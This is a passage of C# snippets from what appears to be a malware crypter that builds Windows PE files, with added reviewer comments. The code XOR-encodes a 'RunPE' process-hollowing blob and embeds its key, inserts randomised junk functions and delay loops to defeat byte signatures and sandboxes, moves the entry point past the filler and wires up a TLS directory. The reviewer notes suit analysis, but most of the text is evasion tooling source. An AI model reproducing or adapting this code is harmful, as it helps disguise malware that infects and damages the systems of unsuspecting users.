            string equLine = string.Format("TLS_CALLBACK_OFFSET EQU 0x{0}", callbackOffset.ToString("X8"));

            File.AppendAllText(offsetIncPath, equLine);

            // Only the data section is rebuilt; a separate TLS-section build is disabled in the original.
            PEFactory.CompileDataSection(PE);
        }
Esempio n. 43
        /// <summary>
        /// Runs the external compiler on the source file that belongs to <paramref name="SectionName"/>,
        /// producing a flat binary at the matching object path.
        /// </summary>
        /// <param name="SectionName">
        /// One of "text", "data", "idata", "bss", "runpe" or "main". Any other value leaves both
        /// paths empty and the compiler is still started.
        /// </param>
        /// <param name="_PE">Build context supplying the source, object, root-directory and compiler paths.</param>
        /// <remarks>
        /// NOTE(review): standard output is drained and discarded; the exit code and standard error
        /// are not inspected, so a failed build is not reported to the caller.
        /// NOTE(review): the paths are placed between double quotes without escaping, so a path that
        /// itself contains a double quote would change how the command line is parsed.
        /// </remarks>
        private static void CompileSection(string SectionName, NewPE _PE)
        {
            string sourceFile;
            string outputFile;

            if (SectionName == "text")
            {
                sourceFile = _PE.PeDirectory.TextSectionPath;
                outputFile = _PE.PeDirectory.TextObjectPath;
            }
            else if (SectionName == "data")
            {
                sourceFile = _PE.PeDirectory.DataSectionPath;
                outputFile = _PE.PeDirectory.DataObjectPath;
            }
            else if (SectionName == "idata")
            {
                sourceFile = _PE.PeDirectory.IDataSectionPath;
                outputFile = _PE.PeDirectory.IDataObjectPath;
            }
            else if (SectionName == "bss")
            {
                // The "bss" key maps to the TLS source/object pair.
                sourceFile = _PE.PeDirectory.TLSSectionPath;
                outputFile = _PE.PeDirectory.TLSObjectPath;
            }
            else if (SectionName == "runpe")
            {
                sourceFile = _PE.PeDirectory.RunPESectionPath;
                outputFile = _PE.PeDirectory.RunPEObjectPath;
            }
            else if (SectionName == "main")
            {
                // "main" assembles the top-level file straight to the final save path.
                sourceFile = _PE.PeDirectory.MainPath;
                outputFile = _PE.PeDirectory.SavePath;
            }
            else
            {
                sourceFile = string.Empty;
                outputFile = string.Empty;
            }

            // Remove a stale output so a file that exists afterwards was produced by this run.
            if (File.Exists(outputFile))
            {
                File.Delete(outputFile);
            }

            ProcessStartInfo startInfo = new ProcessStartInfo
            {
                Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
                                          _PE.PeDirectory.RootDirectoryPath,
                                          sourceFile,
                                          outputFile),
                FileName = _PE.PeDirectory.CompilerPath,
                RedirectStandardOutput = true,
                UseShellExecute = false
            };

            using (Process compiler = Process.Start(startInfo))
            using (StreamReader compilerOutput = compiler.StandardOutput)
            {
                // Reading to end-of-stream blocks until the child closes its standard output.
                compilerOutput.ReadToEnd();
            }
        }
Esempio n. 44
        /// <summary>
        /// Recreates <c>runpe_length.inc</c> with the byte length of the compiled RunPE object
        /// (as <c>RUNPE_CODE_LENGTH</c>, eight hexadecimal digits) and rebuilds the text section.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory and the RunPE object path.</param>
        public static void FixDecryptorLoop(NewPE PE)
        {
            string lengthIncPath = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");

            if (File.Exists(lengthIncPath))
            {
                File.Delete(lengthIncPath);
            }

            // The length is measured from the object file as it currently exists on disk.
            var blobLength = PE.PeDirectory.RunPEObjectPath.ReadBytes().Length;
            string equLine = string.Format("RUNPE_CODE_LENGTH EQU 0x{0}", blobLength.ToString("X8"));

            File.WriteAllText(lengthIncPath, equLine);

            // The text section is rebuilt after the constant changes.
            PEFactory.CompileTextSection(PE);
        }
        /// <summary>
        /// Rewrites the delay-execution include file: every "0x69" placeholder is replaced by a
        /// random hexadecimal constant, and every line containing the ";[JUNK_NO_PRESERVE]" marker
        /// is replaced by a generated filler buffer.
        /// </summary>
        /// <param name="PE">Build context; only <c>PeDirectory.DelayExecutionIncPath</c> is used here.</param>
        /// <param name="bLong">
        /// Selects the range of the constant substituted for "0x69": <c>Rand.Next(25, 50)</c> when
        /// false, <c>Rand.Next(3500000 * 5, 6000000 * 5)</c> when true.
        /// </param>
        /// <remarks>
        /// Analysis note: the substituted constant and the filler bytes are drawn from <c>Rand</c> on
        /// every call, so this part of the generated source is not expected to be byte-stable
        /// between builds.
        /// </remarks>
        public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
        {
            string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();

            byte[] trash_buffer;

            // Both branches are identical: bLong has no effect on the filler length or its arguments.
            if (!bLong)
            {
                int len_trash = Rand.Next(0x100, 0x120);
                trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            }
            else
            {
                int len_trash = Rand.Next(0x100, 0x120);
                trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            }

            for (int i = 0; i < olaf.Length; i++)
            {
                // Every occurrence of the literal "0x69" on the line is replaced by the same new value.
                // NOTE(review): given the file name this is presumably an iteration count - confirm.
                if (olaf[i].Contains("0x69"))
                {
                    if (!bLong)
                        olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
                    else
                        olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
                }

                // The whole marker line is overwritten; the same buffer is reused for every marker,
                // and again both branches do the same thing.
                if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
                {
                    if (!bLong)
                    {
                        olaf[i] = trash_buffer.ToASMBuffer();
                    }
                    else
                    {
                        olaf[i] = trash_buffer.ToASMBuffer();
                    }
                }
            }

            // The include file is replaced in place; the original template content is not kept.
            File.Delete(PE.PeDirectory.DelayExecutionIncPath);
            PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
        }
Esempio n. 46
        /// <summary>
        /// XOR-encodes the compiled RunPE object file with a fresh 16-byte key, writes the key to
        /// <c>runpe_key.inc</c> and rebuilds the data section.
        /// </summary>
        /// <param name="PE">Build context supplying the RunPE object path and the include directory.</param>
        /// <remarks>
        /// Analysis note: the key is written in clear to an include file and the data section is rebuilt
        /// right after, so the key presumably ships in the output next to the encoded bytes. This is
        /// obfuscation rather than confidentiality: whoever holds the file can recover the original bytes.
        /// NOTE(review): the return value of <c>Xor.EncodeDecodeData</c> is ignored, so the method relies
        /// on it transforming the array in place - confirm.
        /// </remarks>
        public static void EncryptCodeAndAddKey(NewPE PE)
        {
            byte[] xorKey = new byte[16];
            Keys.PopulateBuffer(xorKey);

            byte[] runPeBytes = PE.PeDirectory.RunPEObjectPath.ReadBytes();
            Xor.EncodeDecodeData(runPeBytes, xorKey);

            // Replace the object file on disk with the encoded bytes.
            if (File.Exists(PE.PeDirectory.RunPEObjectPath))
            {
                File.Delete(PE.PeDirectory.RunPEObjectPath);
            }

            PE.PeDirectory.RunPEObjectPath.WriteFile(runPeBytes);

            string keyIncPath = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
            string keyAsAsm = xorKey.ToASMBuffer();

            if (File.Exists(keyIncPath))
            {
                File.Delete(keyIncPath);
            }

            File.WriteAllText(keyIncPath, keyAsAsm);

            // The data section is rebuilt after the object file and the key include have changed.
            PEFactory.CompileDataSection(PE);
        }
        /// <summary>
        /// Inserts generated byte buffers into the text-section source at the ";[PRE_EP_FUNCTIONS]",
        /// ";[EP_FUNCTION]" and ";[POST_EP_FUNCTIONS]" markers, records the inserted byte counts in
        /// <paramref name="JCI"/> and rewrites the source file.
        /// </summary>
        /// <param name="PE">Build context; only <c>PeDirectory.TextSectionPath</c> is used here.</param>
        /// <param name="JCI">Receives SIZE_PRE_EP_FUNCTIONS, SIZE_EP_FUNCTION and SIZE_POST_EP_FUNCTIONS.</param>
        /// <param name="Multiplier">Scales the number of buffers: <c>Rand.Next(5 * Multiplier, 10 * Multiplier)</c> per side.</param>
        /// <remarks>
        /// Analysis note: buffer count, length and content are all drawn from <c>Rand</c>, so the code
        /// section differs from build to build and the entry point does not sit at the start of .text
        /// when pre-EP buffers are inserted. Matching on the first bytes of the code section is
        /// therefore unlikely to be stable across builds.
        /// </remarks>
        public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
        {
            string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();

            // Running totals of inserted bytes for each of the three regions.
            int size_pre_ep = 0;
            int size_ep = 0;
            int size_post_ep = 0;

            int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
            int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);

            //   pre - ep
            for (int i = 0; i < pre_ep_func_cnt; i++)
            {
                // Text is inserted before the marker and the marker stays in place, so each
                // iteration finds it again and adds another buffer ahead of it.
                int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
                if (index_of > -1)
                {
                    int func_len = Rand.Next(0x120, 0x200);

                    byte[] func_buffer;

                    // Roughly half of the buffers come from DataConstructor.GenData, the rest from
                    // GenerateLogicalFunction; neither helper is visible here.
                    if (Rand.NextDouble() >= 0.5)
                        func_buffer = new DataConstructor().GenData(func_len, func_len);
                    else
                        func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);

                    // GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
                    // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    // The actual buffer length is counted, not the requested func_len.
                    size_pre_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;

            // ep - 
            {
                // Exactly one buffer is inserted at the entry-point marker, always from GenerateLogicalFunction.
                int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
                if (index_of > -1)
                {
                    int func_len = Rand.Next(0x120, 0x140); // const
                    byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    size_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_EP_FUNCTION = size_ep;

            ////  post - ep
            for (int i = 0; i < post_ep_func_cnt; i++)
            {
                // Same scheme as the pre-EP loop, applied at the post-EP marker.
                int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
                if (index_of > -1)
                {
                    int func_len = Rand.Next(0x120, 0x200);

                    byte[] func_buffer;

                    if (Rand.NextDouble() >= 0.5)
                        func_buffer = new DataConstructor().GenData(func_len, func_len);
                    else
                        func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
                    // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    size_post_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;

            // PAD ENTROPY
            //int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment);

            //byte[] zero_fill = new byte[0x1000];
            //string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin");
            //path_inc.WriteFile(zero_fill);

            // JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2);

            // The source file is replaced with the expanded text, written as ASCII.
            if (File.Exists(PE.PeDirectory.TextSectionPath))
                File.Delete(PE.PeDirectory.TextSectionPath);

            PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);

            // Forces a collection after the string work above.
            GC.Collect();
        }
Esempio n. 48
        /// <summary>
        /// Fills the optional-header fields of <paramref name="PE"/> (code/data sizes and bases,
        /// header and image size, entry point, import directory and TLS directory) from the
        /// current section headers.
        /// </summary>
        /// <param name="PE">Build context whose <c>NtHeader.OptionalHeader</c> is updated in place.</param>
        /// <param name="nCountImportedModules">Not used by the live code; it appears only in a commented-out line.</param>
        /// <remarks>
        /// Analysis note: the entry point is set to the start of .text plus <c>SIZE_PRE_EP_FUNCTIONS</c>,
        /// and a TLS directory is declared inside .data, so a reviewer of the produced binary should
        /// inspect the TLS directory as well as the entry point.
        /// </remarks>
        public static void CalculateNtHeader(NewPE PE, int nCountImportedModules)
        {
            // Sizes are the sections' VirtualSize values rounded up to FileAlignment.
            PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);

            PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) +
                                                               ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);

#if TLS
            PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#endif

            PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress;
            PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // .data?

            PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment);
            // The image ends where the last section in the list ends, rounded up to SectionAlignment.
            PE.NtHeader.OptionalHeader.SizeOfImage = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment);

            // Execution starts after the generated pre-entry-point bytes, not at the start of .text.
            PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS);

            //  uint _magic = (uint)((nCountImportedModules + 1) * 20);

            // The import directory is declared to span the whole .idata section.
            PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress;
            PE.NtHeader.OptionalHeader.ImportDirectory.Size = GetSectionByName(".idata", PE).VirtualSize; // _magic;

            ///            PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress + _magic;
            ///         PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.Size = GetSectionByName(".idata", PE).VirtualSize - _magic;

            // TLS directory address: start of .data + length of the RunPE object file + 16.
            // NOTE(review): the +16 presumably skips a 16-byte key stored after that blob - confirm.
            // This assignment runs whether or not the TLS symbol is defined.
            PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
            PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;

#if TLS
            // Repeats the two assignments above with identical values.
            PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
            PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#endif

        }